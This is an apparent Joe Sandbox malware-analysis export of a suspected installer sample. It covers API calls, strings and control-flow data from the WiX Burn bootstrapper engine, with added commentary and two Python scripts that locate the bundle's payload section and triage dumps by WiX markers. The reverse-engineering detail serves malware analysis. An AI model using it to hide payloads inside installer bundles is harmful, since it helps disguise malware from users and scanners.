91e236-91e23c 171->175 176 91e23e-91e246 171->176 172->171 178 91e257-91e2b1 call 91540b 175->178 179 91e252-91e255 176->179 180 91e248-91e250 176->180 183 91e2b3-91e2d8 call 911225 178->183 184 91e2e2-91e303 call 9575c0 call 91d84a 178->184 179->178 180->178 183->184 184->146 191 91e305-91e317 call 911225 184->191 191->110
APIs
• GetLastError.KERNEL32(?,?,?,00916C5C,00000000,00916570), ref: 0091DBD8
• SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DC2A
• GetLastError.KERNEL32(?,?,?,00916C5C,00000000,00916570), ref: 0091DC34
• ReadFile.KERNELBASE(00916570,00916C78,00000040,?,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DC84
• GetLastError.KERNEL32(?,?,?,00916C5C,00000000,00916570), ref: 0091DC8E
• SetFilePointerEx.KERNELBASE(00916570,00916570,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DCF4
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DCFE
• ReadFile.KERNELBASE(00916570,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DD51
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DD5B
• SetFilePointerEx.KERNELBASE(00916570,009164D8,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DDD5
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DDDF
• ReadFile.KERNEL32(00916570,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DE32
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DE3C
• ReadFile.KERNEL32(00916570,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DE8F
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DE99
• SetFilePointerEx.KERNELBASE(00916570,00916570,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DEEE
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DEF8
• ReadFile.KERNEL32(00916570,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DF52
• ReadFile.KERNEL32(00916570,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DFB2
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091DFBC
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorFileLast$Read$Pointer
• String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data too short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$Invalid section info, cContainers too large: %u$PE$PE Header from file didn't match PE Header in memory.$burn$d:\a\wix4\wix4\src\burn\engine\section.cpp$feclient.dll
• API String ID: 3909885910-3741805499
• Opcode ID: 714c8a906a75f2f34fd099da25cd552fd226764726bf39ba92bbee1b1ab64d5c
• Instruction ID: 0d18b0a9d0fefed5ad888c08734f2094af6306d7040b625bd9769898a6c16409
• Opcode Fuzzy Hash: 714c8a906a75f2f34fd099da25cd552fd226764726bf39ba92bbee1b1ab64d5c
• Instruction Fuzzy Hash: 1A22F972B41338B7E7319A148C46FEBB5ACAF45B14F014559FE19BB3C0E2B49D818B94
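The record above is the WiX Burn bootstrapper engine locating its own payload section inside the bundle: the source path is burn\engine\section.cpp, the error strings name every step (DOS header, NT header, signature offset and size, "seek past optional headers", image section headers, "Failed to find Burn section"), the ".wix" and "burn" strings are consistent with the 8-byte section name ".wixburn" being compared as two DWORD immediates, and the ReadFile sizes match the PE layout exactly: 0x40 bytes for the DOS header, 0x18 for the PE signature plus IMAGE_FILE_HEADER, two 4-byte reads for the certificate-table data directory (Authenticode signature offset and size), then 0x28 bytes per IMAGE_SECTION_HEADER in a loop. For a reverse engineer this matters because the section found this way is where the engine records the sizes of the attached containers (the cContainers checks in the strings), i.e. where the bundle's real payload hangs off. The following Python is an added example, not code from the report or from the WiX project; it performs that same header walk on a constructed PE32 image and returns the file offset of .wixburn together with the signature directory entry. It assumes the standard PE32/PE32+ optional-header layout (data directories at +96 or +112), does not parse the Burn section-info structure that follows (the version and cContainers checks in the strings), and does not do the on-disk versus in-memory header comparison the engine also performs ("PE Header from file didn't match PE Header in memory").

```python
"""
Added example (not report or WiX code): locate the Burn section of a bundle by
walking PE headers in the order the function at 0x91db61 reads them: 0x40-byte
DOS header, 0x18-byte PE signature + file header, the certificate-table data
directory (signature offset/size), then 0x28-byte section headers until
".wixburn" is found.  Standard PE layout is assumed throughout.
"""
import struct

DOS_HEADER_SIZE = 0x40
PE_SIG_AND_FILE_HEADER_SIZE = 0x18
SECTION_HEADER_SIZE = 0x28
BURN_SECTION_NAME = b".wixburn"        # 8 bytes, fills the name field exactly
SECURITY_DIR_INDEX = 4                 # IMAGE_DIRECTORY_ENTRY_SECURITY
OPT_MAGIC_PE32, OPT_MAGIC_PE32PLUS = 0x10B, 0x20B


def find_burn_section(data: bytes) -> dict:
    """Return the file offset/size of .wixburn and the signature directory entry."""
    if len(data) < DOS_HEADER_SIZE or data[:2] != b"MZ":
        raise ValueError("Failed to find valid DOS image header in buffer.")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]

    nt = data[e_lfanew:e_lfanew + PE_SIG_AND_FILE_HEADER_SIZE]
    if len(nt) != PE_SIG_AND_FILE_HEADER_SIZE or nt[:4] != b"PE\0\0":
        raise ValueError("Failed to find valid NT image header in buffer.")
    num_sections = struct.unpack_from("<H", nt, 6)[0]    # IMAGE_FILE_HEADER.NumberOfSections
    size_opt = struct.unpack_from("<H", nt, 20)[0]       # IMAGE_FILE_HEADER.SizeOfOptionalHeader

    opt_off = e_lfanew + PE_SIG_AND_FILE_HEADER_SIZE
    if opt_off + 2 > len(data):
        raise ValueError("Failed to read optional header magic.")
    magic = struct.unpack_from("<H", data, opt_off)[0]
    # Data directories start at +96 in a PE32 optional header and +112 in PE32+.
    dirs_off = {OPT_MAGIC_PE32: 96, OPT_MAGIC_PE32PLUS: 112}.get(magic)
    if dirs_off is None:
        raise ValueError("unsupported optional header magic: %#x" % magic)
    sec_dir = opt_off + dirs_off + SECURITY_DIR_INDEX * 8
    if sec_dir + 8 > len(data):
        raise ValueError("Failed to read signature offset.")
    sig_offset, sig_size = struct.unpack_from("<II", data, sec_dir)

    # Seek past the optional header; the section table follows it immediately.
    sec_table = opt_off + size_opt
    for i in range(num_sections):
        off = sec_table + i * SECTION_HEADER_SIZE
        hdr = data[off:off + SECTION_HEADER_SIZE]
        if len(hdr) != SECTION_HEADER_SIZE:
            raise ValueError("Failed to read complete image section header, index: %d" % i)
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)   # SizeOfRawData, PointerToRawData
        if hdr[:8] == BURN_SECTION_NAME:
            return {"offset": raw_ptr, "size": raw_size,
                    "sig_offset": sig_offset, "sig_size": sig_size}
    raise ValueError("Failed to find Burn section.")


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image (test input only, not a real bundle)."""
    e_lfanew, size_opt, num_sections = 0x80, 0xE0, 2
    burn_ptr, burn_payload = 0x400, b"constructed burn section info"
    sig_ptr, sig_len = 0x600, 0x80

    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    # IMAGE_FILE_HEADER: Machine=i386, sections, timestamp, symtab, nsyms, SizeOfOptionalHeader, flags
    file_hdr = struct.pack("<HHIIIHH", 0x14C, num_sections, 0, 0, 0, size_opt, 0x102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, OPT_MAGIC_PE32)
    struct.pack_into("<II", opt, 96 + SECURITY_DIR_INDEX * 8, sig_ptr, sig_len)

    def section(name, vaddr, size, ptr):   # IMAGE_SECTION_HEADER, 40 bytes
        return struct.pack("<8sIIIIIIHHI", name, size, vaddr, size, ptr, 0, 0, 0, 0, 0x40000040)

    image = bytearray(dos + b"PE\0\0" + file_hdr + bytes(opt))
    image += section(b".text", 0x1000, 0x200, 0x200)
    image += section(BURN_SECTION_NAME, 0x2000, len(burn_payload), burn_ptr)
    image = image.ljust(sig_ptr + sig_len, b"\0")
    image[burn_ptr:burn_ptr + len(burn_payload)] = burn_payload
    return bytes(image)


if __name__ == "__main__":
    info = find_burn_section(build_sample_pe())
    print("Burn section at file offset %#x (%d bytes); Authenticode signature at %#x (%d bytes)"
          % (info["offset"], info["size"], info["sig_offset"], info["sig_size"]))
```

Run against a real bundle by passing the file bytes to find_burn_section; the offset it returns is where the Burn section info begins on disk, which is the right place to start when carving the attached containers for separate scanning. Every read is bounds-checked and fails with the same wording the engine uses, so a truncated or tampered header is reported as an error rather than read past the end of the buffer.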

Control-flow Graph (edge list for the function at 0x91aa6f; the rendered graph is not reproduced in this text export)

control_flow_graph 364 91aa6f-91b442 InitializeCriticalSection 365 91b448-91b46c call 91813a 364->365 368 91b4ba-91b4cd 365->368 369 91b46e-91b481 365->369 371 91b4d2-91b4dc call 911228 368->371 369->365 370 91b483-91b49b call 918218 369->370 376 91b4a5-91b4b8 370->376 377 91b49d-91b4a1 370->377 378 91b4df-91b4ef call 9567e6 371->378 376->371 377->370 379 91b4a3 377->379 379->378
APIs
• InitializeCriticalSection.KERNEL32(0093401A,00917D5B,x86,00917DDB), ref: 0091AA8F
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CriticalInitializeSection
• String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$Failed to add well-known variable: %ls.$InstallerName$InstallerVersion$LogonUser$RebootPending$SeShutdownPrivilege$WixBundleAction$WixBundleActiveParent$WixBundleCommandLineAction$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInProgressName$WixBundleInstalled$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleManufacturer$WixBundleName$WixBundleOriginalSource$WixBundleOriginalSourceFolder$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion$d:\a\wix4\wix4\src\burn\engine\variable.cpp$x86
• API String ID: 32694325-1675731463
                                                                                                                                                                  • Opcode ID: b696f6cc25ed1a54bb139487c95dce3394df1d89e2d6bf91a3b02a5e4a2c95b3
                                                                                                                                                                  • Instruction ID: f7e4f638f2ea306677f8760ba59f12fdbc72c90ef970ab0c4bdf3825df4fbf1e
                                                                                                                                                                  • Opcode Fuzzy Hash: b696f6cc25ed1a54bb139487c95dce3394df1d89e2d6bf91a3b02a5e4a2c95b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 635258B0D217289FDB65DF59C9487CAFAF8BB48744F5085EAE10CA6350D7B00A89CF85

Control-flow Graph
(graph rendering omitted; basic blocks 0093E386-0093E7F4, calling SetEvent, GetLastError, ResetEvent, CreateFileW, SetFilePointerEx and SetEndOfFile, plus internal functions 0091174A, 00911228, 00911225, 00912EC6 and 0091540B)
APIs
• SetEvent.KERNEL32(?,?,?,?,?,0093DE75,?,?), ref: 0093E395
• GetLastError.KERNEL32(?,?,?,?,0093DE75,?,?), ref: 0093E39F
• ResetEvent.KERNEL32(?,?,000000FF,?,?,?,?,0093DE75,?,?), ref: 0093E41C
• GetLastError.KERNEL32(?,?,?,?,0093DE75,?,?), ref: 0093E426
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorEventLast$Reset
• String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %hs$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
• API String ID: 1970322416-1884393483
• Opcode ID: df9c414a0029739b1c0511d27084fa6ac69d995bd77b4ac63a4b15fd5307a3b9
• Instruction ID: 5c78417d7ca2d94ba4cbf4fb838c3626e423775214800083c7c1afe4a6161f65
• Opcode Fuzzy Hash: df9c414a0029739b1c0511d27084fa6ac69d995bd77b4ac63a4b15fd5307a3b9
• Instruction Fuzzy Hash: 76A1E237BC133273EB3256695C4FFAB29589B85F20F120114BE19BF2E1E6A4DC409AD4

Control-flow Graph
(graph rendering omitted; basic blocks 00976323-009765AB, calling GetProcAddress, GetCurrentProcess and RegCloseKey, plus internal functions 00911839, 00911228, 0096CBA8, 0096BEB7, 0097234B, 00915573, 00976232 and 0091367F)
APIs
  • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
  • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00976376
• GetCurrentProcess.KERNEL32(00000000), ref: 0097638E
• RegCloseKey.ADVAPI32(00000000,00000001,00000004,00000001,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019,00000000), ref: 0097658F
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path3utl.cpp, xrefs: 0097635A, 00976565
• kernel32.dll, xrefs: 0097633E
• TEMP, xrefs: 009764CB, 00976527
• Failed to get system Windows subdirectory path TEMP., xrefs: 00976537
• Failed to ensure array size for Windows\TEMP value., xrefs: 00976559
• Failed to check if running as system., xrefs: 009763A0
• Failed to get system Windows subdirectory path SystemTemp., xrefs: 009763CB
• System\CurrentControlSet\Control\Session Manager\Environment, xrefs: 0097641A
• Failed to ensure array size for system TMP value., xrefs: 009764A6
• Failed to ensure array size for Windows\SystemTemp value., xrefs: 009763F0
• GetTempPath2W, xrefs: 0097636E
• Failed to get temp path from system TMP., xrefs: 0097647C
• TMP, xrefs: 00976469
• SystemTemp, xrefs: 009763BB
• Failed to load kernel32.dll, xrefs: 0097634E
• Failed to open system environment registry key., xrefs: 0097644C
• Failed to ensure array size for system TEMP value., xrefs: 00976505
• Failed to get temp path from system TEMP., xrefs: 009764DE
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressCloseCurrentErrorLastLibraryLoadProcProcess
• String ID: Failed to check if running as system.$Failed to ensure array size for Windows\SystemTemp value.$Failed to ensure array size for Windows\TEMP value.$Failed to ensure array size for system TEMP value.$Failed to ensure array size for system TMP value.$Failed to get system Windows subdirectory path SystemTemp.$Failed to get system Windows subdirectory path TEMP.$Failed to get temp path from system TEMP.$Failed to get temp path from system TMP.$Failed to load kernel32.dll$Failed to open system environment registry key.$GetTempPath2W$SystemTemp$System\CurrentControlSet\Control\Session Manager\Environment$TEMP$TMP$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path3utl.cpp$kernel32.dll
• API String ID: 1593934338-44121869
• Opcode ID: 07552b6f0860a47db2dcec28aa3da5441c7eb93dc31eb47c88e3878750712f59
• Instruction ID: 6f5b872ff3404cc6d7a797bde5ee957408de1a9c9b8e81c089de03c393745ecc
• Opcode Fuzzy Hash: 07552b6f0860a47db2dcec28aa3da5441c7eb93dc31eb47c88e3878750712f59
• Instruction Fuzzy Hash: 9271D973F80B25FBDB219A50CC4BFAE7A64DF45B55F158050BA087A1D1E7B49E40DAC0
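The three listings above (variable.cpp, cabextract.cpp, path3utl.cpp) and the wiutil.cpp listing that follows all carry wix4 source paths, WixBundle* variable names, the GetTempPath2W/SystemTemp probe and the list of Msi.dll export names; together they identify the sample's outer layer as the WiX v4 Burn bootstrapper engine, and that engine code is what the report's GetProcAddress and registry-probing signatures fire on. The triage script below is an added example, not Joe Sandbox or WiX Toolset code: it scans a dump or PE image for exactly those markers in both ANSI and UTF-16LE (source paths and export names are narrow, the Burn variable names are wide, as the %ls format strings show) and returns a verdict. The marker lists are copied from the listings; the verdict thresholds and the sample bytes are constructed for the demonstration.

```python
"""Added triage example (not Joe Sandbox or WiX Toolset code): classify a memory
dump or PE image as the WiX v4 Burn bootstrapper engine from the string markers
that the function listings expose. The sample bytes are constructed."""
import re
from typing import Dict, List

# Source paths are __FILE__ literals and GetProcAddress names are LPCSTR, so they
# are narrow; Burn variable names are formatted with %ls, so they are wide.
# Every marker is searched in both encodings rather than guessing per marker.
_SRC_PATTERN = r"d:\\a\\wix4\\wix4\\src\\[\w\\.]+?\.cpp"
_SRC_NARROW = re.compile(_SRC_PATTERN.encode("ascii"), re.IGNORECASE)
_SRC_WIDE = re.compile(_SRC_PATTERN, re.IGNORECASE)

BURN_VARIABLES = (
    "WixBundleAction", "WixBundleElevated", "WixBundleInstalled",
    "WixBundleManufacturer", "WixBundleName", "WixBundleOriginalSource",
    "WixBundleProviderKey", "WixBundleVersion",
)
MSI_EXPORTS = (
    "MsiDeterminePatchSequenceW", "MsiDetermineApplicablePatchesW",
    "MsiEnumProductsExW", "MsiGetPatchInfoExW", "MsiGetProductInfoExW",
    "MsiSetExternalUIRecord", "MsiSourceListAddSourceExW",
    "MsiBeginTransactionW", "MsiEndTransaction",
)
TEMP_PATH_MARKERS = (
    "GetTempPath2W", "SystemTemp",
    r"System\CurrentControlSet\Control\Session Manager\Environment",
)


def _wide_views(data: bytes) -> List[str]:
    """Decode the buffer as UTF-16LE at both byte alignments, ignoring junk."""
    views = []
    for off in (0, 1):
        chunk = data[off:]
        chunk = chunk[: len(chunk) & ~1]  # even length, so nothing is truncated
        views.append(chunk.decode("utf-16-le", errors="ignore"))
    return views


def find_markers(data: bytes, names) -> Dict[str, List[str]]:
    """Return {marker: [encodings it was found in]} for the given marker names."""
    wide = _wide_views(data)
    hits: Dict[str, List[str]] = {}
    for name in names:
        if name.encode("ascii") in data:
            hits.setdefault(name, []).append("ansi")
        if any(name in view for view in wide):
            hits.setdefault(name, []).append("utf16")
    return hits


def burn_source_files(data: bytes) -> List[str]:
    """Collect the wix4 source paths (relative to src\\) that the engine's
    ExitOnFailure logging embedded, e.g. 'burn\\engine\\variable.cpp'."""
    found = set()
    for m in _SRC_NARROW.finditer(data):
        found.add(m.group(0).decode("ascii"))
    for view in _wide_views(data):
        for m in _SRC_WIDE.finditer(view):
            found.add(m.group(0))
    return sorted(p.lower().split("src\\", 1)[1] for p in found)


def classify(data: bytes) -> dict:
    """Verdict plus the evidence behind it. Thresholds are this example's own
    assumption: an engine source path, or three Burn variables, is enough."""
    files = burn_source_files(data)
    variables = find_markers(data, BURN_VARIABLES)
    exports = find_markers(data, MSI_EXPORTS)
    temp_markers = find_markers(data, TEMP_PATH_MARKERS)

    has_engine = any(f.startswith("burn\\engine\\") for f in files)
    if has_engine or len(variables) >= 3:
        verdict = "wix4-burn-engine"
    elif files or exports:
        verdict = "wix4-dutil-only"
    else:
        verdict = "no-wix-markers"
    return {
        "verdict": verdict,
        "source_files": files,
        "burn_variables": sorted(variables),
        "msi_exports": sorted(exports),
        "temp_path_markers": sorted(temp_markers),
    }


# Constructed dump fragment: a narrow __FILE__ path, three wide Burn variable
# names, a dutil path, two narrow Msi export names and the GetTempPath2W probe.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"d:\\a\\wix4\\wix4\\src\\burn\\engine\\variable.cpp\x00"
    + "WixBundleAction\0WixBundleElevated\0WixBundleVersion\0".encode("utf-16-le")
    + b"Failed to add built-in variable: %ls.\x00"
    + b"d:\\a\\wix4\\wix4\\src\\libs\\dutil\\wixtoolset.dutil\\wiutil.cpp\x00"
    + b"MsiBeginTransactionW\x00MsiEndTransaction\x00GetTempPath2W\x00"
    + b"\xcc" * 8
)

if __name__ == "__main__":
    import json
    print(json.dumps(classify(SAMPLE_DUMP), indent=2))
```

To apply it to this report, feed `classify()` the bytes of the dumped region listed as Source File above (the .sdmp at image base 00910000). A positive verdict identifies the installer stub, not the payload: the engine's own temp-path resolution, Msi.dll import resolution and critical-section setup are ordinary Burn behaviour, so analysis time is better spent on the files the report flags as dropped and the process the engine injects into.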

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 637 96f5a7-96f5c7 call 9118c0 640 96f5ea-96f5f7 call 973be0 637->640 641 96f5c9-96f5e5 call 911228 637->641 645 96f5fc-96f619 GetProcAddress 640->645 648 96f740-96f744 641->648 646 96f620-96f63d GetProcAddress 645->646 647 96f61b 645->647 649 96f644-96f661 GetProcAddress 646->649 650 96f63f 646->650 647->646 651 96f746-96f749 call 91367f 648->651 652 96f74e-96f752 648->652 653 96f663 649->653 654 96f668-96f685 GetProcAddress 649->654 650->649 651->652 653->654 656 96f687 654->656 657 96f68c-96f6a9 GetProcAddress 654->657 656->657 658 96f6b0-96f6cd GetProcAddress 657->658 659 96f6ab 657->659 660 96f6d4-96f6f1 GetProcAddress 658->660 661 96f6cf 658->661 659->658 662 96f6f3 660->662 663 96f6f8-96f6ff 660->663 661->660 662->663 664 96f717-96f71e 663->664 665 96f701-96f712 GetProcAddress 663->665 666 96f736 664->666 667 96f720-96f731 GetProcAddress 664->667 665->664 666->648 667->666
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 0096F607
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 0096F62B
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 0096F64F
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 0096F673
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 0096F697
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 0096F6BB
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 0096F6DF
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiBeginTransactionW), ref: 0096F70C
                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiEndTransaction), ref: 0096F72B
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wiutil.cpp, xrefs: 0096F5D8
                                                                                                                                                                  • MsiBeginTransactionW, xrefs: 0096F701
                                                                                                                                                                  • MsiEnumProductsExW, xrefs: 0096F644
                                                                                                                                                                  • Msi.dll, xrefs: 0096F5B9
                                                                                                                                                                  • MsiSetExternalUIRecord, xrefs: 0096F6B0
                                                                                                                                                                  • MsiDeterminePatchSequenceW, xrefs: 0096F5FC
                                                                                                                                                                  • MsiGetProductInfoExW, xrefs: 0096F68C
                                                                                                                                                                  • Failed to load Msi.DLL, xrefs: 0096F5C9
                                                                                                                                                                  • MsiEndTransaction, xrefs: 0096F720
                                                                                                                                                                  • MsiDetermineApplicablePatchesW, xrefs: 0096F620
                                                                                                                                                                  • MsiSourceListAddSourceExW, xrefs: 0096F6D4
                                                                                                                                                                  • MsiGetPatchInfoExW, xrefs: 0096F668
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: Failed to load Msi.DLL$Msi.dll$MsiBeginTransactionW$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEndTransaction$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wiutil.cpp
                                                                                                                                                                  • API String ID: 190572456-4147843358
                                                                                                                                                                  • Opcode ID: c5d5b62394dc8c08087bedfe654e8e004a0cb3b1f95631d40f6a62856fbfa05b
                                                                                                                                                                  • Instruction ID: 8259f2e2b934ea95a64f22e1f0b71f76400a251b9d66e73da04c52114c5d683c
                                                                                                                                                                  • Opcode Fuzzy Hash: c5d5b62394dc8c08087bedfe654e8e004a0cb3b1f95631d40f6a62856fbfa05b
                                                                                                                                                                  • Instruction Fuzzy Hash: C241E47556B204EFEB10AF20ED1AB553BB5FF62749F004169E40E999B0E7B11980FBC0

                                                                                                                                                                   Control-flow Graph
                                                                                                                                                                   control_flow_graph 792 92cd75-92cdc6 CreateFileW 793 92ce17-92ce25 call 9739dd 792->793 794 92cdc8-92cdd2 GetLastError 792->794 802 92ce27-92ce49 call 911228 793->802 803 92ce4e-92ce5a call 972b2e 793->803 796 92cdd4-92cddd 794->796 797 92cddf 794->797 796->797 798 92cde1 797->798 799 92cde6-92ce12 call 911225 call 911228 797->799 798->799 815 92d054-92d064 call 9567e6 799->815 811 92d04d-92d04e CloseHandle 802->811 809 92ce5f-92ce63 803->809 812 92ce65-92ce8a call 911228 809->812 813 92ce8f-92ce94 809->813 811->815 812->811 813->811 816 92ce9a-92cea9 SetFilePointerEx 813->816 819 92cef2-92cf02 call 973f70 816->819 820 92ceab-92ceb5 GetLastError 816->820 829 92cf04-92cf16 819->829 830 92cf1b-92cf2c SetFilePointerEx 819->830 822 92cec2 820->822 823 92ceb7-92cec0 820->823 825 92cec4 822->825 826 92cec9-92cee7 call 911225 822->826 823->822 825->826 838 92ceec-92ceed 826->838 831 92d040 829->831 832 92cf74-92cf84 call 973f70 830->832 833 92cf2e-92cf38 GetLastError 830->833 839 92d045-92d04a call 911228 831->839 846 92cf86-92cf98 832->846 847 